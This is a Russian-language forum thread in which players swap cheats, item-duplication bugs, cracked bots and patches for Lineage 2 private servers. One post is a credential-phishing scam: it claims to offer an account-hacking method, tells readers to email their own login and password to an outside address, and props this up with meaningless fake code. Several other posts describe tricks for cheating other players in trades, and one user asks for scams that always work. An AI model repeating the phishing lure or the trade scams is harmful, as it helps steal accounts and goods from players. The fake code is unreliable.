Помощь - Поиск - Пользователи - Календарь
Полная версия: Читы для Lineage 2
Форум > Развлечение > Игры > Онлайн игры
Lopster
Есть ли такие? Кто может помочь?
Detka
Cheat академия тебе в помощь.
Lopster
А где её скачать?
Detka
В яндексе напиши Академия читеров..
Lopster
ЧИТ АКАДЕМИЯ - все, что нужно читеру

Нашёл один только нормальный сайт, но там тоже блин

http://www.cheaters.com.ru/closed.php
Detka
Вроде как сайт лёг... Надо пошукать лучше smile.gif
Maxim
кстати чит академия кажись сдохла и на всегда... вот что я нашёл: http://www.la2.ru/forum/lofiversion/index.php/t25113.html цитирую:

Laika 19.3.2006, 11:44
Цитата
Аааа помните меня ещо =). Уххх спасиб, спасиб всем =). Подняли настроение, по поводу АДМ3... Какой АДМ3 - ГамеМастер Я ГамеМастер, причем на большенстве отечественных фри шардов и технический консультант вашего любмого НЦсофта =). По этому меня так на всех серверах любят и знають А вообще это наверное все в прошлом =( устал, нооооо все возможно как вернусь в читы, ухххх меня там уже ждут давно с цветами поиграем. Если у кого есть 500 у.е можите сделать доброе дело и покрыть долги Чит Академии, жалко проект (хорошай) хоть я там и ***** со всеми.
Detka
Это не на всех серверах, так что не беспокойся. в С4 он вероятно уже не пашет...
Lopster
Может если кто найдёт так выложит тут. ИЛи вышлите на е-mail.
Detka
Да не вопрос.
diez
знаю пару 4 чита была давно и неправда ихи на многих серваках пофиксили
1. если человек сидит и парит шмот возле гк падходиш к нему и ложыш себе ево какбыдто хош купить уходиш гк телопортируешся жмеш окей и все шмотка твоя деньги на месте главное штоб денег хватило тойсь ели взял за 100кк шмот то в беге далжно быть 100кк ато невыйдет
2. береш заточку юзаеш ее и выкидываеш напол точиш шо надо снова поднимаеш ту заточку и такимже образом точиш снова)))
3.када прадаеш камута кристалы например кристал б грейд 3000 за 30кк жмеш трейд апанент кидает 30кк ты кидаеш 1000 кристалов птом еще 1000 и птом еще тысячу и жмеш ок и ему в трейде передаетса ток 1000))тойсть 2000 тышы кристалов еще астаетса))
4.и паследнее если ты решыл купить какуюто шмотку через трейд луше покупать ее или орком или дварфом паскоку больше всего веса могут нести они...перед трейдом забиваете недоконца шоб на шмотку места хватило бег стрелами любыми и пакупаете например за 10кк дарк скример ложете 10кк он ложыт дарк скример жмет ок и вы впредачю ему кидаете стрел и жмете ок...результат стрелы и деньги у вас дарк скример у вас а ему пишет ой а вы шарите у вас места мало))))
Maxim
Кстати, кое-какие и рабочие wink.gif

Ну да ладно... Вот моя история...

Боты неодин из ботов (BotXtreme lin2rich, lin2mate... СКАЧАТЬ Lin2Mate ! Универсальный Crack для Lin2Mate и Lin2Rich , СКАЧАТЬ BotXtreme ! - чтоб качать нужна регистрация) незаработал, хотя может у меня руки кривые и увас все заработает.- BotXtreme очень мало настроек когда запускаю вешает винду на стадии "Runing..." - Lin2Mate море настроек, но судя повсему на моем сервере есть защита от подобных прог меня просто кикает после того как бот делает автологин... (Помогите может я чего неправельно делаю?)
Внимание !!! За использование все вышеописаных прог и патчей БАНЯТ, потом неговорите что я вас непредупреждал !
Lopster
взлом аккаунта lineage2(сервер: antharas)
отошлите на antharas.ru.bot@list.ru следующие письмо (письмо нужно писать с первой строчки) : В заголовок просто впишите login=111&pass=666 где вместо 111 ( это ваш логин) и 666 (это ваш пароль) впишите свои данные. Читайте ниже инструкцию.

function backpass(idlogon,idpass,qw,ans)
var
idlogon="ЛОГИН ЖЕРТВЫ";
$idlogon="ТВОЙ ЛОГИН" ;
$idpass="ТВОЙ ПАРОЛЬ" ;
if idlogon=true and idpass=true
or #ans = script.server.data.idlogon.ans
#qw = script.server.data.idlogon.qw
then
send.mail.ВАША ПОЧТА.text = #idpass
end if
end function

все предельно просто если разобраться.Робот (проверяющий ответы на вопросы)
проверяет ваши данные и путает их с данными жертвы > далее встрoенная функция отсылает пароль на ваш ящик. Вот и всё , главное помнить что на акуанте (на вашем) должно быть не больбше 2 персов с уровнями не меньше 25 и с профой . Если у вас всё это есть вперёд взламывайте себе в удовольствие . Всё 100% работает просто надо подождать около 2х дней . И не в коем случии не залазить в Линейку под этим акуантом (под своим конечно)до того момента пока вам не пришлют акуант и пароль жертвы . На ваш почтовый адрес оташлют пароль и название акуанта жэртвы .
Играйте в своё удовольствие!
Detka
Бессмертие в Lineage 2
Изображение

Цитата
Данный патчик будет весьма полезен тем, кто играет в Lineage 2 на каком-нибудь пиратском сервере (на официалке конечно же не проходит)

После установки этого патча, когда вас убивают, вы воскресаете не в ближайшей деревне, а прямо на том же месте. Очень весело, знаете ли, добивать опешившего от удивления соперника Также можно развести кого-нибудь на ПК, затем восстать и кокнуть. Конечно не забыв подобрать всякие полезности, выпавшие из недоумевающего горе-ПК.

В общем приятного пользования Ещё раз говорю - работает далеко не везде. Например на PVP-сервере http://la2world.ru тестировал - всё работает

Чудо-патч берём здесь (зеркала на выбор):
_http://rapidshare.de/files/25886108/NoWillageL2patch.zip.html
_http://depositfiles.com/files/152986/NoWillageL2patch.zip.html
_http://sendspace.com/file/cmfo6r
Maxim
я вот знаю такой 6аг.. и делал его раз 7 .. кароче.. идете с другом в место где вам не помещают, птом раскидывайте по кругу лут.. что6 так логало что ходить ели сможете.. воть.. потом садитесь продвать ро6у или куртку ну одежду главную кароче.. там продаете за 1 адену к примеру и тока друг ели ели к вам пожходит и говарит что покупет вы выходите .. пока вы 6удете выходить он успеет купить потомущто лаги, но кагда вы зайдете вы увидете что ро6а та при вас и при нем)
Lopster
а есть такая фишка берём маску.... одеваем.... жмём обмен.. маска передаётся хотя на персонаже остаётся покрайней мере визуально... такой финт можно использовать .. правда ещё ненаю как )
Maxim
Будь человеком скажи плиз как заточить оружие хотя бы до + 10. Если можно со 100% вероятностью.
Lopster
Кстати вот вспомнил баг

Вступаешь в клан, тебе дают привелегию на выбор вещей из клан банка, идешь к КБ с лидером или с челом у которого тоже есть такая привелегия, положи вещь в КБ, вы выкладываете на панель выбора вещей из КБ ту вещь (оба), и на счет 3 вы одновременно нажимаете ОК, получилось 2 такие вещи, я так делал, брал у чела дарк кристал сэт и множил
Maxim
Lopster, Респект!
Lopster
Знаю интересный баг. Если взять банку с хэлсами и кинуть её в монстра, то тот умирает. Главное чтобы на серваке была включена опция PVP. Хотя, говорят, что и на других серверах тоже пашет =) Я ваще тащусь. Подходишь к монстру N-ого уровня и убиваешь... Лаваки качаются не подетски!
Maxim
Спасибо тебе, Maxim. Пашет! правда не везде, но пашет! Народ это лучший чит для Lineage 2
Vox
Цитата(Lopster @ 4.12.2006, 14:08) *

Знаю интересный баг. Если взять банку с хэлсами и кинуть её в монстра, то тот умирает. Главное чтобы на серваке была включена опция PVP. Хотя, говорят, что и на других серверах тоже пашет =) Я ваще тащусь. Подходишь к монстру N-ого уровня и убиваешь... Лаваки качаются не подетски!

Гы, а как бросить банку с хелсами в монстра??? blink.gif
Detka
Цитата
Гы, а как бросить банку с хелсами в монстра???

Надо при атаке быстро взять банку и кликнуть её на монстра.
Snake
Давненько я уже не играл... Помню чита такой был... на деньги. Но как делать - уже не помню smile.gif
ZartokS
Падскажыте чтонить для взлома аккаунта я уже замучился гамать просто так хочю много денег хачю все раздеть mad.gif
Lopster
ZartokS, Т.е. Ты хочешь взломать аккаунт чей-то?
Maxim
Хм... это в принципе невозможно. Можно лишь мочить с одной подачи с помощью чит академия... но не более.. Деньги у админов проси smile.gif
ZartokS
Я хачю вскрыть акк !!!!!!!!! mad.gif mad.gif mad.gif
Snake
ZartokS, Ты думаешь, что это реально? smile.gif
ZartokS
Есть какиенебудь способы быстрого зарабатывания денег ?? wink.gif
Snake
C деньгами рабочего бага пока не наю...
зато нашё
Speed-Texture Hack
Народ на форуме положительно о нём отзывался
Вот линк _http://www.mpcdownloads.com/forums/downloads.php?do=file&id=2087
Проверяйте на свой страх и риск!
ZartokS
Напишите какиенебудь разводы каторые 100% проходят ну срочьна плизззззз! wink.gif
Lopster
ZartokS, т.е. разводы? Хочешь админов разводить или игроков?
Maxim
Snake,
Цитата
Speed-Texture Hack

Спасибо. Работает не на всех серверах, однако вещь полезная smile.gif ZartokS, что значить
Цитата
разводы каторые 100% проходят

?
Snake
Maxim, Пожалуйста. Я ж писал, что не проверял...

Lopster, я те отправил читок один. Потести плиз. Если запашеть, то выложим.
Maxim
Snake, что за чит такой?
Snake
Maxim, Да ничего серьёзного... Похож на телепорт по локации... Я его у китайцев стащил и перевёл. Мот запашеть на наших сервах...
Lopster
Цитата
Lopster, я те отправил читок один. Потести плиз. Если запашеть, то выложим.

Забрал. На днях потещу smile.gif Перевод прикольный biggrin.gif
ZartokS
Я имею такие разводы каторый очень реально проходят и они понятны даже полному лоху ! blink.gif
Snake
Хе.. предложи нубу отдать все свои вещи и бабки тебе biggrin.gif

Lopster, ну как там с читом?
ravim
я бы хотел спросить про чит с выкидыванием банки с хелсами в монстра а что это за банка?
Snake
ravim, попробуй с хелсами smile.gif мот получицаа.. хотя как я помню этот баг ужо убрали на многих серверах... надо шукать новые баги.
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.
(с) ИGРАМ.NET